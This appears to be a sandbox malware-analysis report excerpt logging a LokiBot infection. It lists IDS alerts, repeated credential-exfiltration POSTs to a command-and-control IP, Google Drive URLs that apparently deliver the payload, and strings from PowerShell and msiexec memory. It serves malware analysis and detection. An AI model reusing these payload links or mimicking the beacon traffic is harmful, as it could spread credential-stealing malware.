                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59086 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59084 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59095 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59107 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:59084 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59086 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59091 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59097 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59097 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59091 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59095 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59104 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59095 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59110 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59097 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59110 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59104 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59104 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59104 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59088 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59088 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59108 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59108 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59088 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59098 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59088 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59098 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59094 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59094 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59108 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59108 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59094 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59098 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59094 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59098 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59103 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59103 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59103 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59103 -> 137.184.191.215:80
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 137.184.191.215 137.184.191.215
                Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:59082 -> 172.217.18.110:443
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 149Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                Source: unknownHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 176Connection: close
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/check.php?s=am9ntjjw
                Source: powershell.exe, 00000001.00000002.1864327822.00000211959D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195604000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000001.00000002.1864327822.0000021195A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195640000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2690295829.00000000045E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.2690295829.00000000045E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000001.00000002.1864327822.00000211955FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.00000211959D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
                Source: powershell.exe, 00000001.00000002.1864327822.00000211955FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.00000211959D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/7h
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7P
                Source: powershell.exe, 00000004.00000002.2690295829.0000000004737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7XR#l
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948233936.0000000004250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt
                Source: powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                Source: msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/-
                Source: msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/6
                Source: msiexec.exe, 00000008.00000003.2158130127.0000000004360000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2228849049.0000000004327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/H
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download
                Source: msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.1864327822.0000021194746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021193D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195625000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000001.00000002.1864327822.0000021193D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1864327822.0000021195629000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2126102585.0000000004363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
